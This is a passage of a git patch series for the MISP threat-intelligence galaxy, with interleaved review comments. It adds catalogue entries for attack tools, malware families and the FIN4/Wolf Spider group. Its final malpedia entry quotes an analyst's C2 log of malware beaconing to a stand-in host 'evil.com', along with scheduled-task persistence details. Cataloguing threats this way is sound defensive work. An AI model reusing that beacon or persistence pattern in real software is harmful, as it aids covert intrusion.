"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ebb42bbe-62d7-47d7-a55f-3b08b61d792d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "3433a9e8-1c47-4320-b9bf-ed449061d1c3", + "value": "Empire - S0363" + }, + { + "description": "[RawDisk](https://attack.mitre.org/software/S0364) is a legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer's hard drive. 
In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.(Citation: EldoS RawDisk ITpro)(Citation: Novetta Blockbuster Destructive Malware)", + "meta": { + "external_id": "S0364", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0364", + "https://www.itprotoday.com/windows-78/eldos-provides-raw-disk-access-vista-and-xp", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf" + ], + "synonyms": [ + "RawDisk" + ] + }, + "related": [ + { + "dest-uuid": "2e114e45-2c50-404c-804a-3af9564d240e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b82f7d37-b826-4ec9-9391-8e121c78aed7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "3ffbdc1f-d2bf-41ab-91a2-c7b857e98079", + "value": "RawDisk - S0364" + }, + { + "description": "[LaZagne](https://attack.mitre.org/software/S0349) is a post-exploitation, open-source tool used to recover stored passwords on a system. It has modules for Windows, Linux, and OSX, but is mainly focused on Windows systems. 
[LaZagne](https://attack.mitre.org/software/S0349) is publicly available on GitHub.(Citation: GitHub LaZagne Dec 2018)", + "meta": { + "external_id": "S0349", + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0349", + "https://github.com/AlessandroZ/LaZagne" + ], + "synonyms": [ + "LaZagne" + ] + }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "b76b2d94-60e4-4107-a903-4a3a7622fb3b", + "value": "LaZagne - S0349" + }, + { + "description": "[Impacket](https://attack.mitre.org/software/S0357) is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols. [Impacket](https://attack.mitre.org/software/S0357) contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.(Citation: Impacket Tools)", + "meta": { + "external_id": "S0357", + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0357", + "https://www.secureauth.com/labs/open-source-tools/impacket" + ], + "synonyms": [ + "Impacket" + ] + }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b39d03cb-7b98-41c4-a878-c40c1a913dc0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + 
"dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "26c87906-d750-42c5-946c-d4162c73fc7b", + "value": "Impacket - S0357" + }, + { + "description": "[Ruler](https://attack.mitre.org/software/S0358) is a tool to abuse Microsoft Exchange services. It is publicly available on GitHub and the tool is executed via the command line. The creators of [Ruler](https://attack.mitre.org/software/S0358) have also released a defensive tool, NotRuler, to detect its usage.(Citation: SensePost Ruler GitHub)(Citation: SensePost NotRuler)", + "meta": { + "external_id": "S0358", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0358", + "https://github.com/sensepost/ruler", + "https://github.com/sensepost/notruler" + ], + "synonyms": [ + "Ruler" + ] + }, + "related": [ + { + "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "90ac9266-68ce-46f2-b24f-5eb3b2a8ea38", + "value": "Ruler - S0358" + }, + { + "description": "[Nltest](https://attack.mitre.org/software/S0359) is a Windows command-line utility used to list domain controllers and enumerate domain trusts.(Citation: Nltest Manual)", + "meta": { + "external_id": "S0359", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0359", + 
"https://ss64.com/nt/nltest.html" + ], + "synonyms": [ + "Nltest" + ] + }, + "related": [ + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "981acc4c-2ede-4b56-be6e-fa1a75f37acf", + "value": "Nltest - S0359" } ], - "version": 11 + "version": 13 } From ed351b4eae13b0820f5f590ad67d101b982ed4a2 Mon Sep 17 00:00:00 2001 From: Rony <49360849+r0ny123@users.noreply.github.com> Date: Wed, 1 May 2019 15:24:59 +0530 Subject: [PATCH 21/50] updated FIN4 --- clusters/threat-actor.json | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index 24c73ed..dd846ac 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json 
@@ -2619,15 +2619,22 @@
 "value": "Berserk Bear"
 },
 {
+ "description": "FIN4 is a financially-motivated threat group that has targeted confidential information related to the public financial market, particularly regarding healthcare and pharmaceutical companies, since at least 2013. FIN4 is unique in that they do not infect victims with typical persistent malware, but rather they focus on capturing credentials authorized to access email and other non-public correspondence.",
 "meta": {
 "attribution-confidence": "50",
 "country": "RO",
- "synonyms": [
- "FIN4"
+ "refs": [
+ "https://www.reuters.com/article/2015/06/23/us-hackers-insidertrading-idUSKBN0P31M720150623",
+ "https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html",
+ "https://www2.fireeye.com/rs/fireye/images/rpt-fin4.pdf",
+ "https://pwc.blogs.com/cyber_security_updates/2015/06/unfin4ished-business.html"
+ ],
+ "synonyms": [
+ "Wolf Spider"
 ]
 },
 "uuid": "ff449346-aa9f-45f6-b482-71e886a5cf57",
- "value": "Wolf Spider"
+ "value": "FIN4"
 },
 {
 "description": "First observed activity in December 2013.",
From 3b185d8435582999d3cd3faf79fcbaba6773d066 Mon Sep 17 00:00:00 2001
From: Rony <49360849+r0ny123@users.noreply.github.com>
Date: Wed, 1 May 2019 15:40:10 +0530
Subject: [PATCH 22/50] Update threat-actor.json
---
 clusters/threat-actor.json | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index dd846ac..29dab9c 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
@@ -2629,7 +2629,7 @@
 "https://www2.fireeye.com/rs/fireye/images/rpt-fin4.pdf",
 "https://pwc.blogs.com/cyber_security_updates/2015/06/unfin4ished-business.html"
 ],
- "synonyms": [
+ "synonyms": [
 "Wolf Spider"
 ]
 },
From c565f61761be06e360ab133dc2ee2aacdcf1c72e Mon Sep 17 00:00:00 2001
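Review bot: The `+ "value": "FIN4"` line renames the primary name of an existing entry (uuid ff449346-…) and demotes the old name to a synonym, so any consumer that keys galaxy entries by `value` rather than uuid will see this as a brand-new actor; `[PATCH 25/50]` later in this series flips it back to `"value": "Wolf Spider"` with `"FIN4"` as the synonym, so the intended primary name should be settled once and stated in the commit message rather than changed twice. The added `+ "synonyms": [` line also appears to differ from the next patch's version only in whitespace, which suggests a trailing space that a `jq .` pass before committing would have removed.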
From: Rony <49360849+r0ny123@users.noreply.github.com>
Date: Wed, 1 May 2019 15:51:56 +0530
Subject: [PATCH 23/50] Update threat-actor.json
---
 clusters/threat-actor.json | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index 29dab9c..0ce1a0f 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
@@ -8,7 +8,7 @@
 ],
 "category": "actor",
 "description": "Known or estimated adversary groups targeting organizations and employees. Adversary groups are regularly confused with their initial operation or campaign.",
- "name": "Threat actor",
+ "name": "Threat actor",226
 "source": "MISP Project",
 "type": "threat-actor",
 "uuid": "7cdff317-a673-4474-84ec-4f1754947823",
@@ -2630,7 +2630,7 @@
 "https://pwc.blogs.com/cyber_security_updates/2015/06/unfin4ished-business.html"
 ],
 "synonyms": [
- "Wolf Spider"
+ "Wolf Spider"
 ]
 },
 "uuid": "ff449346-aa9f-45f6-b482-71e886a5cf57",
From 0afaf814380cc70eb3e7ecf673ec0655bb2ab371 Mon Sep 17 00:00:00 2001
From: Rony <49360849+r0ny123@users.noreply.github.com>
Date: Wed, 1 May 2019 15:54:38 +0530
Subject: [PATCH 24/50] Update threat-actor.json
---
 clusters/threat-actor.json | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index 0ce1a0f..e952332 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
@@ -8,7 +8,7 @@
 ],
 "category": "actor",
 "description": "Known or estimated adversary groups targeting organizations and employees. Adversary groups are regularly confused with their initial operation or campaign.",
- "name": "Threat actor",226
+ "name": "Threat actor",
 "source": "MISP Project",
 "type": "threat-actor",
 "uuid": "7cdff317-a673-4474-84ec-4f1754947823",
From 37da9bebdf3d177e047de48279c8fe50d78346c0 Mon Sep 17 00:00:00 2001
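Review bot: The added `+ "name": "Threat actor",226` line in the first hunk of `[PATCH 23/50]` is not valid JSON — a bare `226` after the comma makes every strict parser reject clusters/threat-actor.json at this revision, which breaks any schema-validation CI and makes the range unusable for git-bisect. `[PATCH 24/50]` removes it again, so the two commits should be squashed so that no published revision of the file is unparseable. Running the file through `jq .` or `python -m json.tool` before committing would have caught this at the editor.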
From: Alexandre Dulaunoy
Date: Wed, 1 May 2019 17:41:03 +0200
Subject: [PATCH 25/50] chg: [threat-actor] FIN4 updates
---
 clusters/threat-actor.json | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index e952332..7e79a6e 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
@@ -2630,11 +2630,11 @@
 "https://pwc.blogs.com/cyber_security_updates/2015/06/unfin4ished-business.html"
 ],
 "synonyms": [
- "Wolf Spider"
+ "FIN4"
 ]
 },
 "uuid": "ff449346-aa9f-45f6-b482-71e886a5cf57",
- "value": "FIN4"
+ "value": "Wolf Spider"
 },
 {
 "description": "First observed activity in December 2013.",
From f51f13e84bbea7bcc2e4fea60e5f56cb23499ce3 Mon Sep 17 00:00:00 2001
From: Deborah Servili
Date: Thu, 2 May 2019 10:15:26 +0200
Subject: [PATCH 26/50] add AESDDoS Botnet
---
 clusters/botnet.json | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)
diff --git a/clusters/botnet.json b/clusters/botnet.json
index a57b2bf..545602e 100644
--- a/clusters/botnet.json
+++ b/clusters/botnet.json
@@ -1147,7 +1147,17 @@
 },
 "uuid": "f387e30a-dc48-11e8-b9f4-370bc63008bf",
 "value": "Chalubo"
+ },
+ {
+ "description": "Our honeypot sensors recently detected an AESDDoS botnet malware variant (detected by Trend Micro as Backdoor.Linux.AESDDOS.J) exploiting a server-side template injection vulnerability (CVE-2019-3396) in the Widget Connector macro in Atlassian Confluence Server, a collaboration software program used by DevOps professionals.",
+ "meta": {
+ "refs": [
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/aesddos-botnet-malware-exploits-cve-2019-3396-to-perform-remote-code-execution-ddos-attacks-and-cryptocurrency-mining/"
+ ]
+ },
+ "uuid": "809d100b-d46d-40f4-b498-5371f46bb9d6",
+ "value": "AESDDoS"
 }
 ],
- "version": 19
+ "version": 20
 }
From dda2ede5f25f56640bfedbaaab1758d57d38f9f2 Mon Sep 17 00:00:00 2001
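Review bot: The new AESDDoS `description` in `[PATCH 26/50]` is lifted verbatim from the referenced Trend Micro post in the vendor's first person (`Our honeypot sensors recently detected...`), which reads as if the MISP Project operated those honeypots and loses the vendor attribution once the text is displayed on its own. It should be rewritten in the galaxy's voice, and the detection name should be matchable rather than buried in prose, e.g. `"description": "AESDDoS is a Linux botnet malware variant reported by Trend Micro exploiting CVE-2019-3396, a server-side template injection flaw in the Widget Connector macro of Atlassian Confluence Server, to achieve remote code execution and then perform DDoS attacks and cryptocurrency mining."` together with `"synonyms": ["Backdoor.Linux.AESDDOS.J"]` inside `meta`. The exploited CVE would also be more useful to consumers as structured metadata than as a parenthetical in the text.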
From: Deborah Servili
Date: Thu, 2 May 2019 13:02:00 +0200
Subject: [PATCH 27/50] add JasperLoader
---
 clusters/tool.json | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)
diff --git a/clusters/tool.json b/clusters/tool.json
index 8493546..9fb9806 100644
--- a/clusters/tool.json
+++ b/clusters/tool.json
@@ -7660,7 +7660,17 @@
 },
 "uuid": "50baa4dc-0667-4b47-b4aa-374a2743f409",
 "value": "Cowboy"
+ },
+ {
+ "description": "JasperLoader employs a multi-stage infection process that features several obfuscation techniques that make analysis more difficult. It appears that this loader was designed with resiliency and flexibility in mind, as evidenced in later stages of the infection process. ",
+ "meta": {
+ "refs": [
+ "https://blog.talosintelligence.com/2019/04/jasperloader-targets-italy.html?m=1"
+ ]
+ },
+ "uuid": "d8de6b56-9950-4389-83b8-4fc3262dc4c9",
+ "value": "JasperLoader"
 }
 ],
- "version": 118
+ "version": 119
 }
From b706738d4676ffc230dcc33c94f63508c8e92a67 Mon Sep 17 00:00:00 2001
From: Alexandre Dulaunoy
Date: Thu, 2 May 2019 14:47:00 +0200
Subject: [PATCH 28/50] chg: [malpedia] jq all the things
---
 clusters/malpedia.json | 32 ++++++++++++++++----------------
 1 file changed, 16 insertions(+), 16 deletions(-)
diff --git a/clusters/malpedia.json b/clusters/malpedia.json
index 28bd70b..c2c2e22 100644
--- a/clusters/malpedia.json
+++ b/clusters/malpedia.json
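Review bot: The JasperLoader reference URL in `[PATCH 27/50]` carries Blogger's mobile-view query string (`...jasperloader-targets-italy.html?m=1`); drop `?m=1` so the ref is the canonical article URL and matches any other entry citing the same Talos post. The `description` also ends with a trailing space before the closing quote (`infection process. "`) and is quoted from the post without saying so; something like `"JasperLoader is a multi-stage loader, reported by Cisco Talos in April 2019 in campaigns targeting Italy, that layers several obfuscation techniques to hinder analysis and is built for resiliency and flexibility in its later infection stages."` keeps the same facts in the galaxy's own voice with the source named.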
@@ -1032,7 +1032,7 @@ "value": "Triada" }, { - "description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware\u2019s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.", + "description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware’s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triout", 
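Review bot: This hunk, and the sibling hunks at 2307, 3082, 3784, 3878, 5264, 6674 and 6942, only replace `\uXXXX` escapes in `description` strings with the literal UTF-8 characters; that is valid, interoperable JSON, but clusters/malpedia.json appears to be generated from an upstream source, so unless the generator itself emits non-ASCII literally (`ensure_ascii=False` for Python's `json.dump`, or the same `jq` normalization run as part of the build) the next regeneration will flip all sixteen lines straight back. It would help to record in the commit message, or better in the generator, which encoding is canonical for this file so that the churn does not repeat. Note that the strings themselves are data the galaxy serves to consumers, so whichever form is chosen must stay byte-stable across regenerations for hashes and diffs to be meaningful.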
@@ -2307,7 +2307,7 @@ "value": "Bateleur" }, { - "description": "\u2022 BELLHOP is\ta JavaScript backdoor interpreted using the native Windows Scripting Host(WSH).\r\nAfter performing some basic host information gathering, the BELLHOP dropper\tdownloads a base64-encoded blob of JavaScript to disk and\tsets\tup persistence in three ways:\r\n\u2022 Creating a Run key in the Registry\r\n\u2022 Creating a RunOnce key in the Registry\r\n\u2022 Creating a persistent named scheduled task\r\n\u2022 BELLHOP communicates using HTTP\tand HTTPS with primarily benign sites such as Google\tDocs and PasteBin.\r\n", + "description": "• BELLHOP is\ta JavaScript backdoor interpreted using the native Windows Scripting Host(WSH).\r\nAfter performing some basic host information gathering, the BELLHOP dropper\tdownloads a base64-encoded blob of JavaScript to disk and\tsets\tup persistence in three ways:\r\n• Creating a Run key in the Registry\r\n• Creating a RunOnce key in the Registry\r\n• Creating a persistent named scheduled task\r\n• BELLHOP communicates using HTTP\tand HTTPS with primarily benign sites such as Google\tDocs and PasteBin.\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.bellhop", @@ -3082,7 +3082,7 @@ "value": "Patcher" }, { - "description": "Backdoor as a fork of OpenSSH_6.0 with no logging, and \u201c-P\u201d and \u201c-z\u201d hidden command arguments. \u201cPuffySSH_5.8p1\u201d string.", + "description": "Backdoor as a fork of OpenSSH_6.0 with no logging, and “-P” and “-z” hidden command arguments. “PuffySSH_5.8p1” string.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pintsized", 
@@ -3784,7 +3784,7 @@ "value": "Acronym" }, { - "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim\u2019s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.", + "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker", 
@@ -3878,7 +3878,7 @@ "value": "Agent Tesla" }, { - "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine\u2019s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.", + "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. 
Variants can steal information, gathering the infected machine’s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aldibot", @@ -5264,7 +5264,7 @@ "value": "BreachRAT" }, { - "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\\u0445\u043f-\u043f\u0440\u043e\u0431\u0438\u0432\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n", + "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\хп-пробив\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader" 
@@ -6674,7 +6674,7 @@
 "value": "Dairy"
 },
 {
- "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on \u201cquality over quantity\u201d in email-based threats. DanaBot\u2019s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ",
+ "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot",
@@ -6942,7 +6942,7 @@
 "value": "DeriaLock"
 },
 {
- "description": " A DLL backdoor also reported publicly as \u201cDerusbi\u201d, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.",
+ "description": " A DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi",
@@ -9032,7 +9032,7 @@ "value": "Graftor" }, { - "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card\u2019s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system\u2019s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.", + "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. 
Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos", 
@@ -9634,7 +9634,7 @@ "value": "HyperBro" }, { - "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If \u201c/i\u201d is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If \u201c/I\u201d is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] 
